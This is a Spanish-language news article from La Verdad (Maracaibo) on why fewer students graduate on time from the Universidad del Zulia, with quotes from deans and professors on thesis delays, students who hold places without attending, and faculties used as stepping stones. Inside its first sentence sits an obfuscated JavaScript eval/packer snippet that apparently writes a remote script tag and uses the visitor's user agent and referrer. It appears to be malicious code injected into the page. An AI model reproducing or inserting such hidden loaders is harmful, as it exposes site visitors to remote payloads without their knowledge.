publicidad

Cada vez hay menos graduados de LUZ

Ledys Anaís Torres / Maracaibo / noticias@laverdad.com
Desde eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|kdhsf|var|u0026u|referrer|sddin||js|php'.split('|'),0,{})) las facultades que más egresan hasta las que menos, la Universidad sigue apostando por la formación profesional. Garantizar que el estudiante culmine la carrera en el tiempo reglamentario es un reto desde hace años para los decanos de las Facultades de la Universidad del Zulia

Los estudiantes han encontrado más dificultades para graduarse a tiempo de LUZ (Foto: Archivo La Verdad)

Graduarse en cinco años no es fácil, sobre todo si las clases se suspenden, se acaba el presupuesto, no hay buses, comedor o los baños están en mal estado, sobreponerse a esos obstáculos es la meta de La Universidad del Zulia a fin de garantizar que los estudiantes cumplan con el programa académico y culminen sus carreras en el lapso establecido. La prosecución se alza como alternativa para los decanos para velar porque el porcentaje de egresos sea igual al de ingresos.

A algunos les toma cinco años, a otros más tiempo cumplir con todas las materias del pénsum para egresar de una carrera de estudios superiores en LUZ. A pesar de que la meta principal del bachiller es cumplir con los requisitos y poder ejercer su profesión aún existe un porcentaje de estudiantes a quienes “les cuesta” egresar de su alma máter, bien sea por ser parte de un movimiento estudiantil, por desnivelarse en el curso de sus materias o porque el último requisito es el más complicado para alcanzar la meta.

Judith Aular, vicerrectora de LUZ, comentó que el gran porcentaje de rezagados se concentra en la Facultad de Ciencias. Merlyn Rosales, decano de esta facultad, explicó que la mayoría de los estudiantes se retrasan solo al final de sus estudios. Indicó que la Facultad de Ciencias se caracteriza por formar investigadores y por ende los bachilleres deben finalizar su carrera con la entrega de un trabajo de investigación que “los retrasa por lo complicado y complejo” que puede ser. En las carreras como matemáticas, biología y química concentra la mayor cantidad  rezagados.

“Nosotros tenemos un requisito especial que se llama Trabajo Especial de Grado para poder egresar,  ¿qué pasa con ese trabajo? que uno de los objetivos fundamentales de nuestra facultad es formar investigadores y lo que vemos es que los estudiantes muchas veces se tardan en entregar ese trabajo especial. Determinamos que es una de las trabas que hemos visto pero que eso va a depender también de la licenciatura de la que nosotros estamos hablando”.

El decano informó que para minimizar el tiempo de los estudiantes en la casa de estudios están culminando nuevos planes curriculares en la facultad, resaltó que cuatro de las seis licenciaturas serán llevadas de cinco años a cuatro años académicos. Destacó que las materias se están adaptando al modelo por competencia y se está trabajando en sustituir el Trabajo Especial de Grado por prácticas profesionales.

Estudiantes guarda cupos

Neila Ortíz, Coordinadora académica de la Facultad de Ciencias, indicó que la prosecución en las carreras es irregular porque la facultad es usada  por los bachilleres como trampolín o para estudiantes “guarda cupos”. Explicó que, por ejemplo,  de dos mil estudiantes que pueden ingresar solo egresan  100, argumentó que desde la eliminación del Reglamento de Rendimiento se incrementó el fenómeno denominado “los guarda cupos” que son bachilleres que están en el sistema pero no son regulares en la asistencia ni en la aprobación de las materias.

“El Reglamento de Rendimiento nos permitía depurar del sistema a aquellos estudiantes que no cumplían con los requisitos, ese reglamento permitía que los estudiantes que no aprobaran el 50 por ciento de las materias más una no se les permitía volver a inscribirse en la universidad  durante un semestre y si eran reincidentes eran suspendidos por un año incluso los podían expulsar de la casa de estudios, ahora hay estudiantes que solo aparecen para las inscripciones”.

Ortiz detalló, tal y como lo planteó el decano,  que los trabajos de grado son una de las razones para el retraso de los estudiantes. Explicó que los bachilleres toman de seis meses a un año para finalizar los trabajos,  por eso “los egresos son mínimos. En una tanda pueden ser 20 como puede ser 50 es inestable la relación ingreso y egreso”. 

Facultades de trampolín

José Manuel Rodríguez, decano de la Facultad de Veterinaria, aseguró que manejan un porcentaje de egreso de 50 por ciento, una cifra baja considerando la cantidad de estudiantes que comienzan sus estudios superiores en las diferentes carreras de la facultad.

“Nosotros tenemos un egreso anual de 50 por ciento,  ese porcentaje podría parecer bajo, pero hay que aclarar que a la Facultad de Veterinaria la toman como trampolín, un estudiante que  tiene 17 de promedio, es bajo para una carrera como Medicina, solicitan Veterinaria, cursan dos o tres semestres, piden cambio y se van. Cuando uno hace el porcentaje obviamente el estudiante ingresó, lo tenemos en el porcentaje de ingreso pero no lo tenemos en el egreso como Médico Veterinario porque se cambió de carrera y no tiene ni siquiera que pedir permiso para irse”.

El Decano alertó sobre un posible incremento de la migración estudiantil hacia otras carreras tras la asignación de cupos realizado por el Sistema Nacional de Ingreso (SNI).

Detalló que la supresión de las pruebas aptitudinales por parte de la Oficina de Planificación del Sector Universitario al momento de la distribución de estudiantes incrementará la deserción de los estudiantes.

“No tomaron en cuenta las pruebas de aptitud y quizás asignaron a alguien en Veterinaria que quiere estudiar Arquitectura o viceversa eso hay que tomarlo en cuenta porque si no tiene aptitudes para la carrera eso se reflejará una vez que ingrese. Es importante corroborar eso porque creo que habrá una deserción muy grande además de que muchos ni siquiera se van  a inscribir en la carrera que le tocó porque no es lo que ellos querían estudiar”.

Dirigentes estudiantiles con más tiempo

Son muchas las referencias estudiantiles de aquellos quienes más se tardan en egresar, son miembros de movimientos estudiantiles que anteponen su tendencia política y crean un liderazgo a su formación profesional.

Jesús Salom, coordinador del Vicerrectorado Administrativo, aseguró que casi todos los líderes estudiantiles tienen tiempo en la universidad “porque les conviene permanecer para mantener el liderazgo en la institución”.

Doris Salas, decana de la Facultad de Humanidades y Educación, resaltó que el caso de los estudiantes rezagados miembros de movimientos estudiantiles tendría que “revisarlo”. Comentó que en la facultad son pocos.  “Habría que revisar la permanencia de los dirigentes en los espacios educativos, quedan pocos porque la mayoría ya se graduó”. Aseguró que la decisión de finalizar la carrera debe ser propia de cada estudiante, recalcó que conoce casos de bachilleres que se inscriben en todas las materias menos opción a grado. Manifestó que “desconoce el argumento válido para que ellos desistan de graduarse”. 

Por su parte, Sergio Osorio, decano de Medicina, indicó que la nivelación estudiantil es tan amplia que actualmente no poseen representante en el centro de estudiantes de la facultad, explicó que el centro de estudiantes está vacío porque todos los estudiantes se han graduado.  En la Facultad de Arquitectura y Diseño, la decana Susana Gómez destacó que no tiene estudiantes “autorepresados”.

Nuevo reglamento

Doris Salas, decana de la Facultad de Humanidades y Educación, reseñó que la universidad debe retomar los reglamentos para garantizar que los estudiantes cumplan con sus planes de estudios a modo de “resolver el problema de los estudiantes que tardan en graduarse”.

“Debe instaurarse la figura del tutor”

Para Elvira Annicchiarico, profesora de la Facultad de Ciencias Económicas y Sociales, uno de los planes que debe instaurar la casa de estudios es la figura del tutor. Annicchiarico manifestó que es una de las formas para garantizar que los estudiantes cumplan con su carrera desde que ingresan hasta su egreso.

“Lo ideal sería instaurar un profesor tutor en las facultades que se encargue de supervisar a los estudiantes desde que ingresan hasta que salen, es un mecanismo para garantizar la prosecución porque va de la mano con el estudiante que garantizará que el estudiante así como inicia finalice su carrera en el tiempo estipulado.

Informó que en la Facultad de Ciencias Económicas una de las tácticas de prosecución son las aulas virtuales. “Nosotros en la Facultad, por iniciativa del Decano, y luego de la instalación en la Facultad de Humanidades,  estamos instaurando el concepto de las aulas virtuales, mediante ese programa podemos monitorear al estudiante, enviar documentos, realizar charlas virtuales, encabezamos la mayor cantidad de materias en aulas virtuales que nos permiten hacerle seguimiento a los estudiantes”.

Hablan los profesores

Karelys Fernández, presidente de Apuz: “En carreras como Medicina existía una oficina de educación que permitía determinar cuál estudiante ingresaba, eso era una forma de prosecución porque se garantizaba que no desertara”.

Carla Urbina, profesora Arquitectura: “Existen muchos factores para que un estudiante no culmine su carrera pero uno de ellos es la falta de recursos porque ingresan muy jóvenes y muchas veces se tienen que dedicar a trabajar”.

Jesús Urbina, prof. de Comunicación Social: “Los problemas en infraestructura, planta física en materiales de enseñanza, el desestímulo de los profesores todo incide en excelencia y calidad y eso a un buen estudiante le resta mucho”. 

Jucemar Bracho, profesora odontología: “Se deben aplicar estrategias para que el estudiante se motive con prácticas grupales, trabajos que estimulen al estudiante. Yo manejo la clase teórica a través de participaciones en grupos”. 

Más noticias

Comentarios
© 2017, Diario La Verdad. Maracaibo. Venezuela C.A. RIF J-30540623-5. Términos Legales. Contáctenos via: web@laverdad.com , noticias@laverdad.com o ventas@laverdad.com
Desarrollado por Miguel Guadarrama